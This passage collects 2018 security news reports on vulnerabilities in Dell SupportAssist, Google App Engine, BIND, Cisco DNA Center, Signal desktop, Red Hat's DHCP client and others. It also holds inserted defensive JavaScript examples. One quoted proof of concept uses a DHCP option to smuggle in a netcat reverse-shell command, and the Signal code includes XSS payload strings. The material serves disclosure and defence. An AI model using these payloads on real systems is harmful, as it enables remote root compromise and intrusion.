The security issue resides in a kernel driver the tool loads, Bryan Alexander, the security researcher who discovered the issue, reveals. The Dell SupportAssist tool is mainly used to troubleshoot issues and offer support to both the user and Dell.

The vulnerability can be abused to bypass driver signature enforcement (DSE) ad infinitum, the researcher says. The driver, he explains, exposes a lot of functionality, providing “capabilities for reading and writing the model-specific register (MSR), resetting the 1394 bus, and reading/writing CMOS.”

The impacted driver is first loaded when SupportAssist is launched (filename pcdsrvc_x64.pkms or pcdsrvc.pkms, depending on architecture). Although used by Dell, the driver is built by PC-Doctor, a company that offers “system health solutions” to computer makers such as Dell, Intel, Yokogawa, IBM, and others.

“Once the driver is loaded, it exposes a symlink to the device at PCDSRVC{3B54B31B-D06B6431-06020200}_0 which is writable by unprivileged users on the system. This allows us to trigger one of the many IOCTLs exposed by the driver; approximately 30,” the researcher explains.

Alexander also found a DLL used by the userland agent that worked as an interface to the kernel driver and had symbol names available. Further analysis revealed a MemDriver class that allows userland services to read and write arbitrary physical addresses.

For that, however, the driver must be ‘unlocked’ to start processing control codes. To unlock it, one would simply need to send a system call (ioctl) containing the proper code. Next, the driver sets a global flag and “will process control codes for the lifetime of the system,” the researcher notes.

To exploit the issue, one can start reading physical memory looking for process pool tags, then identify a target process and a SYSTEM process, and then steal the token.

“However, PCD appears to give us a shortcut via getPhysicalAddress ioctl. If this does indeed return the physical address of a given virtual address (VA), we can simply find the physical of our VA and enable a couple token privileges using the writePhysicalMemory ioctl,” the researcher notes.

The issue, nevertheless, is that only usermode addresses can be resolved this way, as the MmProbeAndLockPages call is passing in UserMode for the KPROCESSOR_MODE.

Even so, one could still read chunks of physical memory, and the researcher used that to toggle on SeDebugPrivilege for the current process token (which requires “finding the token in memory and writing a few bytes at a field offset”).

Once the physical address of the token has been identified, the researcher triggered two separate writes at the Enabled and Default fields of a _TOKEN. The researcher published the source code of the bug on GitHub.

The vulnerability was reported to Dell in early April, but a patched version of SupportAssist was only released last week.


Researcher Earns $36,000 for Google App Engine Flaws
21.5.2018 securityweek 
Vulnerebility

An 18-year-old researcher has earned more than $36,000 from Google after finding a critical remote code execution vulnerability related to the Google App Engine.

Part of the Google Cloud offering, the App Engine is a framework that allows users to develop and host web applications on a fully managed serverless platform.

In February, Ezequiel Pereira, a student from Uruguay, managed to gain access to a non-production Google App Engine development environment. Once he obtained access, he discovered that he could use some of Google’s internal APIs.

Pereira did not notice anything that appeared dangerous before his first report through Google’s Vulnerability Reward Program (VRP), but his findings were assigned a P1 priority rating, which indicates that the issue needs to be addressed quickly as it may impact a large percentage of users.

After looking around more, the researcher did come across some interesting methods and submitted a second report to Google. Following the second report, the tech giant escalated the issue and advised Pereira to stop his tests as he might “easily break something using these internal APIs.”

Google’s own analysis of the security holes led to the determination that they could have been exploited for remote code execution “due to the way Google works.”

Google awarded the researcher a total of $36,337 for his findings, including $5,000 for a less severe issue. The first report was sent to the company on February 25 and a patch was rolled out sometime between March 6 and March 13, Pereira said.

The expert has published a blog post detailing his findings and his interactions with Google.

This was not the first time Pereira discovered serious vulnerabilities in Google services. In the past few years, he earned thousands of dollars through the VRP.

Bug bounty hunters often push their tests to the limit due to concerns that the vendor might downplay their findings if they don’t clearly demonstrate the impact of a vulnerability. However, at least in Pereira’s case, Google does appear to have calculated bug bounty payouts based on full potential impact. In the past, the expert earned up to $10,000 for weaknesses that initially did not appear to be worth much in terms of a bug bounty.


Internet Systems Consortium rolled out security updates to address 2 flaws in BIND DNS Software
21.5.2018 securityaffairs 
Vulnerebility

On Friday, the Internet Systems Consortium (ISC) announced security updates for BIND DNS software that address two vulnerabilities rated with a “medium” severity rating.
Both vulnerabilities could be exploited by attackers to cause a denial-of-service (DoS) condition; the first, tracked as CVE-2018-5737, can also cause severe operational problems such as service degradation.

“A problem with the implementation of the new serve-stale feature in BIND 9.12 can lead to an assertion failure in rbtdb.c, even when stale-answer-enable is off. Additionally, problematic interaction between the serve-stale feature and NSEC aggressive negative caching can in some cases cause undesirable behavior from named, such as a recursion loop or excessive logging.” reads the security advisory published by the ISC.

“Deliberate exploitation of this condition could cause operational problems depending on the particular manifestation — either degradation or denial of service.”

The flaw affects BIND 9.12.0 and 9.12.1: servers running these versions which permit recursion to clients and which have the max-stale-ttl parameter set to a non-zero value are at risk.

The Internet Systems Consortium (ISC) has addressed the flaw with the release of BIND 9.12.1-P2. The organization provided the following workaround:

Setting “max-stale-ttl 0;” in named.conf will prevent exploitation of this vulnerability (but will effectively disable the serve-stale feature.)
Setting “stale-answer-enable off;” is not sufficient to prevent exploitation; max-stale-ttl needs to be set to zero.

The second flaw tracked as CVE-2018-5736 is remotely exploitable if the attacker can trigger a zone transfer.

“An error in zone database reference counting can lead to an assertion failure if a server which is running an affected version of BIND attempts several transfers of a slave zone in quick succession,” states the advisory published by the ISC.

“This defect could be deliberately exercised by an attacker who is permitted to cause a vulnerable server to initiate zone transfers (for example: by sending valid NOTIFY messages), causing the named process to exit after failing the assertion test.”

The CVE-2018-5736 flaw affects BIND 9.12.0 and 9.12.1; the ISC addressed it with the release of version 9.12.1-P1. Experts noted that admins need to update to version 9.12.1-P2 because version 9.12.1-P1 was itself affected by a defect.

This is the third time that the ISC has provided security updates for BIND software this year. The first updates were released in January to address a high severity vulnerability that could crash DNS servers.

The second updates were released in February to address remotely exploitable vulnerabilities in DHCP.


Google awarded a young expert a total of $36,337 for an RCE in the Google App Engine
21.5.2018 securityaffairs  
Vulnerebility

Google awarded the 18-year-old student Ezequiel Pereira a total of $36,337 for the discovery of a critical remote code execution vulnerability that affected the Google App Engine.
The Google App Engine is a framework that allows Google users to develop and host web applications on a fully managed serverless platform.

In February, Pereira gained access to a non-production Google App Engine development environment, then he discovered that it was possible to use some of Google’s internal APIs.

Pereira ethically reported the issue through Google’s Vulnerability Reward Program (VRP). The experts at Google ranked the flaw as a P1 priority, a level that is assigned to vulnerabilities that could have a significant impact on a large number of users and that for this reason must be addressed as soon as possible.

Meanwhile, Pereira continued his tests and submitted a second report to Google after discovering further issues; Google then asked Pereira to stop his activities because he might “easily break something using these internal APIs.”

Google’s security team determined that the flaw reported by the youngster could lead to remote code execution.


Pereira published a detailed analysis of his findings after Google fixed them and awarded him.

“In early 2018 I got access to a non-production Google App Engine deployment environment, where I could use internal APIs and it was considered as Remote Code Execution due to the way Google works. Thanks to this I got a reward of $36,337 as part of Google Vulnerability Rewards Program.” reads the blog post published by the researcher.

“Some time ago, I noticed every Google App Engine (GAE) application replied to every HTTP request with a “X-Cloud-Trace-Context” header, so I assumed any website returning that header is probably running on GAE.
Thanks to that, I learned “appengine.google.com” itself runs on GAE, but it can perform some actions that cannot be done anywhere else and common user applications cannot perform, so I tried to discover how was it able to do those actions.
Obviously, it has to make use of some API, interface or something only available to applications ran by Google itself, but maybe there was a way to access them, and I looked for that.”

The timeline for the flaw:

February 2018: Issue found
February 25th, 2018: Initial report (only the “stubby” API)
March 4th and 5th, 2018: The “app_config_service” API discovered and reported
March between 6th and 13th, 2018: The access to non-prod GAE environments was blocked with a 429 error page
March 13th, 2018: Reward of $36,337 issued
May 16th, 2018: Issue confirmed as fixed


Two Vulnerabilities Patched in BIND DNS Software
20.5.2018 securityweek 
Vulnerebility

Updates announced on Friday by the Internet Systems Consortium (ISC) for BIND, the most widely used Domain Name System (DNS) software, patch a couple of vulnerabilities.

While attackers may be able to exploit both of the flaws remotely for denial-of-service (DoS) attacks, the security holes have been assigned only a “medium” severity rating.

One of the vulnerabilities, tracked as CVE-2018-5737, can allow a remote attacker to cause operational problems, including degradation of the service or a DoS condition.

“A problem with the implementation of the new serve-stale feature in BIND 9.12 can lead to an assertion failure in rbtdb.c, even when stale-answer-enable is off,” ISC explained in an advisory. “Additionally, problematic interaction between the serve-stale feature and NSEC aggressive negative caching can in some cases cause undesirable behavior from named, such as a recursion loop or excessive logging.”

The vulnerability impacts BIND 9.12.0 and 9.12.1 if the server is configured to allow recursion to clients and the max-stale-ttl parameter has a value other than zero. The issue has been patched in BIND 9.12.1-P2, but workarounds are also available.

The second flaw, CVE-2018-5736, is also remotely exploitable, but only if the attacker can trigger a zone transfer.

“An error in zone database reference counting can lead to an assertion failure if a server which is running an affected version of BIND attempts several transfers of a slave zone in quick succession,” ISC wrote. “This defect could be deliberately exercised by an attacker who is permitted to cause a vulnerable server to initiate zone transfers (for example: by sending valid NOTIFY messages), causing the named process to exit after failing the assertion test.”

This vulnerability impacts BIND 9.12.0 and 9.12.1, and it has been patched in version 9.12.1-P1. However, users need to update to version 9.12.1-P2 as version 9.12.1-P1 was recalled before the public announcement due to a defect.

ISC support customers, including OEMs that re-package the organization’s open source code into commercial products, were notified about these vulnerabilities on May 9.

The latest version of BIND also includes a security improvement related to update-policy rules. ISC also noted that “named will now log a warning if the old root DNSSEC key is explicitly configured and has not been updated.”

This is the third round of security updates released for BIND this year. The first was released in mid-January and the second in late February. The February update impacted BIND Supported Preview Edition, but not any publicly released versions.
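The two BIND write-ups above give the CVE-2018-5737 exposure conditions (BIND 9.12.0 or 9.12.1, recursion permitted, max-stale-ttl non-zero) and ISC's caveat that stale-answer-enable off is not enough. The following audit script is an added example, not ISC's code; it locates statements in a named.conf fragment with simple regexes rather than a full named.conf grammar, and does not resolve per-view overrides.

```javascript
// Added example (not ISC's code): audit a named.conf fragment for the
// CVE-2018-5737 exposure described in the BIND articles: BIND 9.12.0 or 9.12.1,
// recursion permitted, and max-stale-ttl set to a non-zero value.
// Assumptions: statements are located with simple regexes rather than a full
// named.conf grammar, and per-view overrides are not resolved.

// Remove named.conf comments: /* ... */, // ... and # ... styles.
function stripComments(conf) {
  return conf
    .replace(/\/\*[\s\S]*?\*\//g, "")
    .replace(/(^|\s)(\/\/|#)[^\n]*/gm, "$1");
}

// Value of a statement such as `max-stale-ttl 1w;` or `recursion yes;`,
// or null when the statement is absent.
function findStatement(conf, name) {
  const re = new RegExp(`(?:^|[\\s{;])${name}\\s+([^;{}]+);`, "m");
  const m = re.exec(conf);
  return m ? m[1].trim().replace(/^"|"$/g, "") : null;
}

// Convert a BIND TTL (plain seconds or a duration such as 1w or 2d12h) to seconds.
function ttlToSeconds(value) {
  if (/^\d+$/.test(value)) return Number(value);
  const unit = { w: 604800, d: 86400, h: 3600, m: 60, s: 1 };
  let total = 0;
  const re = /(\d+)([wdhms])/gi;
  let m;
  while ((m = re.exec(value)) !== null) {
    total += Number(m[1]) * unit[m[2].toLowerCase()];
  }
  return total;
}

// Versions the advisory lists as affected; 9.12.1-P2 carries the fix.
const AFFECTED_VERSIONS = new Set(["9.12.0", "9.12.1"]);

// Returns the facts the verdict rests on, the `exposed` verdict, and advice.
function auditServeStale(version, namedConf) {
  const conf = stripComments(namedConf);

  // BIND defaults to `recursion yes;` when the statement is absent.
  const recursionValue = findStatement(conf, "recursion");
  const recursion = recursionValue === null || recursionValue.toLowerCase() === "yes";

  // Recorded only so the advice can explain why this setting is not enough.
  const staleAnswerEnable = findStatement(conf, "stale-answer-enable");

  // A missing max-stale-ttl leaves the build default in force; this audit
  // treats "unknown" as "not proven zero" and asks for an explicit setting.
  const ttlValue = findStatement(conf, "max-stale-ttl");
  const maxStaleTtl = ttlValue === null ? null : ttlToSeconds(ttlValue);

  const affectedVersion = AFFECTED_VERSIONS.has(version);
  const exposed = affectedVersion && recursion && maxStaleTtl !== 0;

  const advice = [];
  if (affectedVersion) advice.push("upgrade to BIND 9.12.1-P2");
  if (exposed && maxStaleTtl === null) advice.push("set max-stale-ttl 0; explicitly in named.conf");
  if (exposed && maxStaleTtl > 0) advice.push("set max-stale-ttl 0; (disables serve-stale) until upgraded");
  if (exposed && staleAnswerEnable && staleAnswerEnable.toLowerCase() === "off") {
    advice.push("stale-answer-enable off; alone does not prevent exploitation");
  }
  return { affectedVersion, recursion, staleAnswerEnable, maxStaleTtl, exposed, advice };
}

// Constructed sample configs (not from the page): the weak setting and the workaround.
const VULNERABLE_CONF = `
options {
    directory "/var/cache/bind";
    recursion yes;
    stale-answer-enable off;   // the ISC advisory says this is not sufficient
    max-stale-ttl 1w;
};
`;
const HARDENED_CONF = VULNERABLE_CONF.replace("max-stale-ttl 1w;", "max-stale-ttl 0;");

console.log(auditServeStale("9.12.1", VULNERABLE_CONF));
console.log(auditServeStale("9.12.1", HARDENED_CONF));
```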


Critical Flaws in Cisco DNA Center Allow Unauthorized Access
18.5.2018 securityweek 
Vulnerebility

Cisco has found and patched three critical unauthorized access vulnerabilities in its Digital Network Architecture (DNA) platform.

Cisco DNA is a solution that helps enterprises automate network operations, making it easy to design, provision and apply policies across their environments.

Cisco discovered that the DNA Center is impacted by three serious flaws. One of them, CVE-2018-0222, is related to the existence of undocumented static credentials for the default admin account.

A remote attacker could leverage these credentials to gain access to the affected system and execute commands with root privileges. The issue has been addressed with the release of Cisco DNA Center software version 1.1.3.

The second vulnerability, CVE-2018-0271, allows a remote attacker to bypass authentication and obtain privileged access to critical services in the DNA Center. This flaw has been patched with the release of Cisco DNA Center software version 1.1.2.

“The vulnerability is due to a failure to normalize URLs prior to servicing requests. An attacker could exploit this vulnerability by submitting a crafted URL designed to exploit the issue,” Cisco explained in an advisory.

The third critical security hole in DNA Center, CVE-2018-0268, also allows a remote attacker to bypass authentication and obtain elevated privileges. A patch is included in version 1.1.3.

“This vulnerability is due to an insecure default configuration of the Kubernetes container management subsystem within DNA Center,” Cisco said. “An attacker who has the ability to access the Kubernetes service port could execute commands with elevated privileges within provisioned containers. A successful exploit could result in a complete compromise of affected containers.”

All the vulnerabilities were discovered by Cisco itself and there is no evidence of malicious exploitation.

Cisco published more than a dozen security advisories on Wednesday, including four that describe high severity vulnerabilities.

The list includes a cross-site request forgery (CSRF) flaw in IoT Field Network Director (IoT-FND), a denial-of-service (DoS) bug in the Identity Services Engine (ISE), a shell access vulnerability in Enterprise NFV Infrastructure Software (NFVIS), and a DoS problem in Meeting Server.


CISCO issued security updates to address three critical flaws in Cisco DNA Center
18.5.2018 securityaffairs
Vulnerebility

Cisco has issued security updates to address three critical vulnerabilities in its DNA Center appliance, admins need to update their installs as soon as possible.
Cisco has issued security updates to address three critical vulnerabilities in its Digital Network Architecture (DNA) Center appliance.

The DNA Center is a network management and administration tool. Experts discovered three vulnerabilities that could be exploited by remote unauthenticated attackers to take over the appliance.

The most severe issue is a static credentials vulnerability (CVE-2018-0222) affecting the DNA Center; an attacker can use the credentials to completely take over the targeted appliance.

“A vulnerability in Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to log in to an affected system by using an administrative account that has default, static user credentials.” reads the security advisory published by Cisco.

The experts found undocumented, static user credentials for the default administrative account in the affected software.

“The vulnerability is due to the presence of undocumented, static user credentials for the default administrative account for the affected software. An attacker could exploit this vulnerability by using the account to log in to an affected system.” continues the advisory.

“A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands with root privileges.”

The second vulnerability tracked as CVE-2018-0271 affects the API gateway of the Cisco Digital Network Architecture (DNA) Center.

The flaw could be exploited by a remote unauthenticated attacker to bypass authentication and gain privileged access to critical services in the DNA Center.

“A vulnerability in the API gateway of the Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to bypass authentication and access critical services.” reads the Cisco advisory.

“The vulnerability is due to a failure to normalize URLs prior to servicing requests. An attacker could exploit this vulnerability by submitting a crafted URL designed to exploit the issue.”

The third critical flaw in DNA Center fixed by Cisco tracked as CVE-2018-0268 could be exploited by an attacker to bypass authentication within the container instances and obtain elevated privileges.

“This vulnerability is due to an insecure default configuration of the Kubernetes container management subsystem within DNA Center,” states the Cisco security advisory. “An attacker who has the ability to access the Kubernetes service port could execute commands with elevated privileges within provisioned containers. A successful exploit could result in a complete compromise of affected containers.”

Cisco rolled out a security update to DNA Center via its System Updates tool; admins need to install version 1.1.3 as soon as possible.


Critical Code Execution Flaws Patched in Advantech WebAccess

16.5.2018 securityweek  Vulnerebility

Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address nearly a dozen vulnerabilities, including critical flaws that allow arbitrary code execution.

Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. The product is used in the United States, Europe and East Asia in the energy, critical manufacturing, and water and wastewater sectors.

The list of security holes rated critical includes unrestricted file upload, path traversal, stack-based buffer overflow, and untrusted pointer dereference issues, all of which can be exploited for arbitrary code execution.

Advantech has also fixed high severity vulnerabilities that can be exploited to obtain sensitive information, modify files, and delete files. There are also a couple of medium severity issues that can be leveraged to steal session cookies and obtain potentially sensitive data through SQL injection.

According to ICS-CERT, the flaws affect WebAccess versions V8.2_20170817 and prior, WebAccess V8.3.0 and prior, WebAccess Dashboard V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior. The vendor patched them with the release of version 8.3.1 last week.

ICS-CERT has credited researchers Mat Powell, Andrea Micalizzi (rgod), Steven Seeley, Donato Onofri and Simone Onofri for discovering the security bugs. Many of the weaknesses were reported through Trend Micro’s Zero Day Initiative (ZDI), which will publish advisories in the coming weeks.

Seeley has identified tens of vulnerabilities in WebAccess this year, and some of them, affecting WebAccess HMI Designer, were disclosed in April before Advantech released patches.

ICS-CERT has published a total of four advisories for Advantech WebAccess vulnerabilities this year, including two in January.

A report published last year by Trend Micro’s Zero Day Initiative (ZDI) showed that it had taken Advantech, on average, 131 days to patch vulnerabilities, which was significantly better compared to many other major ICS vendors. ZDI published more than 50 advisories for Advantech vulnerabilities in 2017, which was roughly half the number published in the previous year.


Adobe Patches Two Dozen Critical Flaws in Acrobat, Reader
16.5.2018 securityweek 
Vulnerebility

Updates released on Monday by Adobe for its Acrobat, Reader and Photoshop products patch nearly 50 vulnerabilities, including a remote code execution flaw that has been exploited in the wild.

A total of 47 security holes have been addressed in the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017. The flaws have been resolved with the release of versions 2018.011.20040, 2017.011.30080 and 2015.006.30418.

The vulnerabilities include 24 critical memory corruptions that allow arbitrary code execution in the context of the targeted user, and various types of “important” issues that can lead to information disclosure or security bypasses.

The most serious of the flaws is CVE-2018-4990, which has been exploited in the wild in combination with CVE-2018-8120, a zero-day vulnerability affecting Windows. CVE-2018-8120 was fixed by Microsoft with the May 2018 Patch Tuesday updates.

Independent experts and researchers from Cisco Talos, ESET, Kaspersky, Check Point, Palo Alto Networks, Tencent, Knownsec 404 Security Team, Cybellum and Cure53 have been credited for responsibly disclosing the flaws patched with the latest Acrobat and Reader releases. Many of the security bugs were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

Adobe also informed customers that support for Acrobat and Reader 11.x ended on October 15, 2017, and that version 11.0.23 is the final release for these branches. Users have been advised to update to the latest versions of Acrobat DC and Acrobat Reader DC.

Adobe has also released security updates for the Windows and macOS versions of Photoshop CC to address a flaw reported by researcher Giwan Go.

Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4 fix a critical out-of-bounds write issue that can be exploited for arbitrary code execution in the context of the targeted user.

Earlier this month, Adobe patched several vulnerabilities in its Flash Player, Creative Cloud and Connect products with the company’s Patch Tuesday updates.

The previous round of security updates for Acrobat and Reader resolved 39 vulnerabilities. However, those updates had been assigned a priority rating of “2,” which makes them less likely to be exploited, while the latest patches have been given a priority rating of “1,” which means exploitation is more likely and users should update as soon as possible.

*Updated with information on CVE-2018-4990


Signal Flaw Allowed Code Execution With No User Interaction
16.5.2018 securityweek 
Vulnerebility

An update released over the weekend for the desktop version of the privacy-focused communications app Signal patches a critical vulnerability that could have been exploited for remote code execution with no user interaction required.

Several researchers were looking at an unrelated cross-site scripting (XSS) vulnerability when they noticed that the XSS payload was triggered in the Signal desktop application.

The white hat hackers discovered that they could execute arbitrary code in the app simply by sending a specially crafted message containing specific HTML elements to the targeted user.

“The Signal-desktop software fails to sanitize specific html-encoded HTML tags that can be used to inject HTML code into remote chat windows. Specifically the <img> and <iframe> tags can be used to include remote or local resources,” the researchers explained in an advisory.

They created proof-of-concept (PoC) payloads that could be used to crash Signal, obtain data from the targeted device’s /etc/passwd file, execute a remote JavaScript file, display a message in an iframe, play audio and video files, display a phishing page, and exfiltrate conversations.


“The critical thing here was that it didn’t require any interaction from the victim, other than simply being in the conversation. Anyone can initiate a conversation in Signal, so the attacker just needs to send a specially crafted URL to pwn the victim without further action,” Iván Ariel Barrera Oro, one of the researchers involved in finding the vulnerability, wrote in a blog post.

The vulnerability affects versions 1.7.1, 1.8.0, 1.9.0 and 1.10.0 on Windows, Linux and likely macOS. Signal developers patched the issue within a couple of hours with the release of version 1.10.1 on Saturday.

Based on an analysis of the source code, researchers determined that the flaw had been previously patched but the fix was removed – likely by accident – with a change made on April 10.


Hackers shared technical details of a Code Injection flaw in Signal App
16.5.2018 securityaffairs
Vulnerebility

Researchers shared details of a code injection vulnerability they found in the Signal app for both Windows and Linux systems. The flaw was promptly fixed by Signal.
Signal has fixed a code injection vulnerability in the app for both Windows and Linux systems that was reported by a team of Argentinian experts.

A remote attacker could have exploited the flaw to inject malicious code into the Signal desktop app running on the recipients’ system without requiring any user interaction, just by sending the victims a specially crafted link.

The discovery of the flaw was accidental: the white-hat hackers Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo were chatting on Signal messenger when one of them shared a link to an XSS-vulnerable Argentinian government website.

The experts noticed that the XSS payload was executed on the recipients’ Signal desktop app.

“we were chatting as usual and suddenly Alfredo shows us an XSS in an Argentinian government site (don’t worry, it’s been reported). He was using the Signal add-on for Chrome. Javier and I were using the desktop version, based on the insecure electron framework. As I was reading, something caught my attention: an icon was showing next to the URL, as a “picture not found” icon.” reads a blog post published by the experts.


“I jumped from my chair and warned: “your XSS is triggered in signal-desktop!!”.”

The researchers then ran further tests against the Signal desktop app and found that the vulnerability lay in the function responsible for handling shared links.

They found that the flaw could be exploited to inject attacker-controlled HTML via iframe, image, video and audio tags; inline scripts, by contrast, were blocked by the app’s Content Security Policy.

“We tried different kinds of HTML elements: img, form, script, object, frame, frameset, iframe, sound, video (these last two were funny).” the experts continue. “They all worked, except that CSP blocked the execution of scripts, which halted in some way this attack. However, to abuse this vuln, we could:

crash the app with repeated and specially crafted URLs, obtaining segmentation fault/DoS (Alfredo’s app crashed several times but mine didn’t, so we couldn’t reproduce it)
send a crafted image in base64 format (we didn’t carry on with this)
send a file/phish and execute it with <iframe src=”…”></iframe>
have fun with <img>, <audio> and <video> 🙂”
An attacker could also inject a form into the recipient’s chat window and trick them into entering sensitive information, a classic social engineering lure.
The researchers praised the Signal security team, which fixed the issue on Friday less than two hours after the report.

The researchers noted that the flaw did not allow attackers to execute system commands or obtain sensitive information such as decryption keys from the recipient’s system.

After Signal fixed the issue, the researchers examined the file’s history and found that the patch relies on a regular expression to validate URLs.
The “patch” had already existed in the application but was probably removed by accident in an April 10 commit that fixed a linking issue.
The researchers remain wary of that regex and worry that someone might find a way around it.
The Signal app nonetheless remains the most secure choice for encrypted communication.
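The sink the researchers describe, a chat client that splices message text into HTML when it renders links, can be shown in a few lines. The following is an added example and not Signal’s code: a deliberately vulnerable renderer beside one that escapes everything first and only builds a link around a URL that parses with an http or https scheme. It goes slightly beyond the Signal case by also rejecting javascript: links. The messages, the function names and the loose URL pattern are constructed for the demonstration; it runs under Node.js and returns HTML strings, so no DOM is needed.

```javascript
// Added example, not Signal's code: a message renderer that splices text into
// HTML (the XSS sink the researchers describe) beside a hardened one.
// Runs under Node.js and returns HTML strings, so no DOM is required.

// Constructed attacker messages. In an Electron renderer a CSP may block inline
// <script>, but <img>, <iframe>, <form>, <audio> and <video> still render, which
// is what the researchers saw in Signal desktop.
const ATTACK_MESSAGES = [
  'see https://example.gov/ <img src=x onerror=alert(1)>',
  'click javascript:alert(document.cookie)',
];

// Deliberately loose "looks like a URL" pattern: scheme, colon, non-space run.
// The allowlist check in safeHref, not this pattern, is what does the guarding.
const LOOSE_URL = /\b[a-z][a-z0-9+.-]*:\S+/gi;

// Vulnerable pattern: raw message text is wrapped in anchors and handed to
// innerHTML. Markup in the message becomes markup in the chat window.
function renderMessageUnsafe(text) {
  const linked = text.replace(LOOSE_URL, m => `<a href="${m}">${m}</a>`);
  return `<p class="msg">${linked}</p>`;
}

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => HTML_ESCAPES[c]);
}

// Only strings that parse as a WHATWG URL and use http or https become links;
// javascript:, data:, file: and unparsable strings stay plain text.
function safeHref(candidate) {
  let url;
  try { url = new URL(candidate); } catch (e) { return null; }
  return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : null;
}

// Hardened pattern: every piece of the message is escaped, and a link is only
// built around a URL that passed safeHref. Both the href and the visible text
// are escaped, so nothing in the message can close the attribute or the tag.
function renderMessageSafe(text) {
  let html = '';
  let last = 0;
  for (const m of text.matchAll(LOOSE_URL)) {
    html += escapeHtml(text.slice(last, m.index));
    const href = safeHref(m[0]);
    const shown = escapeHtml(m[0]);
    html += href
      ? `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${shown}</a>`
      : shown;
    last = m.index + m[0].length;
  }
  html += escapeHtml(text.slice(last));
  return `<p class="msg">${html}</p>`;
}

for (const msg of ATTACK_MESSAGES) {
  console.log('unsafe:', renderMessageUnsafe(msg));
  console.log('safe:  ', renderMessageSafe(msg));
}
```

The hardened renderer still lets the text `onerror=alert(1)` through, but only as text: the angle brackets are escaped, so the browser never sees a tag. A CSP that forbids inline scripts is a second layer rather than a substitute, since, as the researchers found, img, iframe, form, audio and video elements need no script to do damage.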


Red Hat Linux DHCP Client affected by a command injection flaw, patch it now!
16.5.2018 securityaffairs
Vulnerebility

Red Hat has announced a critical vulnerability in its DHCP client tracked as CVE-2018-1111 that could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.
Felix Wilhelm of Google’s security team discovered a critical remote command injection vulnerability in the DHCP client packages of Red Hat Enterprise Linux; the issue also affects derived distributions such as Fedora.

The vulnerability, tracked as CVE-2018-1111, could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.

Felix Wilhelm
@_fel1x
CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: https://access.redhat.com/security/vulnerabilities/3442151 …. Exploit fits in a tweet so you should patch as soon as possible.

3:54 PM - May 15, 2018
“Red Hat has been made aware of a command injection flaw found in a script included in the DHCP client (dhclient) packages in Red Hat Enterprise Linux 6 and 7.” reads the security advisory published by Red Hat.

“A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager which is configured to obtain network configuration using the DHCP protocol.”

The DHCP client receives network configuration parameters, including its IP address and DNS servers, from the DHCP (Dynamic Host Configuration Protocol) server.

The CVE-2018-1111 command injection flaw resides in the NetworkManager integration script of the DHCP client packages in Red Hat Enterprise Linux.

The researcher Barkın Kılıç published a tweet-sized PoC for CVE-2018-1111; in his screenshot the attacker obtains a root shell.


Barkın Kılıç
@Barknkilic
#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat

9:21 PM - May 15, 2018
Wilhelm did not release his own PoC exploit, but he noted that the exploit is so short that it fits in a tweet.

According to Wilhelm, an attacker running a malicious DHCP server, or sitting on the same network as the victim and spoofing DHCP responses, can exploit this vulnerability to run arbitrary commands with root privileges on a victim system running the vulnerable DHCP client.

The vulnerability affects Red Hat Enterprise Linux 6 and 7; administrators should update their packages to the fixed versions as soon as they are available.

“Users have the option to remove or disable the vulnerable script, but this will prevent certain configuration parameters provided by the DHCP server from being configured on a local system, such as addresses of the local NTP or NIS servers,” Red Hat warns.

Below is the full list of affected RHEL versions:

Advanced Update Support 6.4
Extended Update Support 7.3
Advanced Update Support 6.6
Red Hat Enterprise Linux 6
Extended Update Support 6.7
Advanced Update Support 7.2
Server TUS (v.6.6)
RHEL 7
Extended Update Support 7.4
Virtualization 4 Management Agent for RHEL 7 Hosts
Advanced Update Support 6.5
Linux Server TUS (v. 7.2)

Red Hat’s update services for SAP Solutions on x86 and IBM Power architectures are also affected.

Fedora has already released new versions of DHCP packages containing fixes for Fedora 26, 27, and 28.

Other Linux distributions such as openSUSE and Ubuntu are not affected, because their DHCP client packages do not ship the NetworkManager integration script by default.


Mysterious hackers ingenuously reveal two Zero-Days to security community
16.5.2018 securityaffairs
Vulnerebility

Mysterious hackers ingenuously revealed two zero-days to the security community; the affected vendors collaborated to fix them promptly.
Anton Cherepanov, a security researcher at ESET, discovered two zero-days while analyzing a malicious PDF; according to him, the unknown attacker(s) were still working on the exploits.

The malicious PDF was discovered in late March 2018 (two suspicious PDF samples were found); analysis of the document revealed that it exploited two previously unknown vulnerabilities: a remote code execution flaw in Adobe Reader and a Windows privilege escalation flaw.

“The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year.” reads the analysis published by ESET.

“The sample does not contain a final payload, which may suggest that it was caught during its early development stages,” Cherepanov said.

ESET shared its discovery with the Microsoft Security Response Center, the Windows Defender ATP research team, and the Adobe Product Security Incident Response Team, which fixed the bugs.

The two zero-days were tracked as CVE-2018-4990, that affected Adobe Acrobat/Reader PDF viewer, and as CVE-2018-8120 that affected the Win32k component of Windows.

By chaining the two vulnerabilities, the attacker could execute arbitrary code inside Adobe Acrobat/Reader and then escape its sandbox.

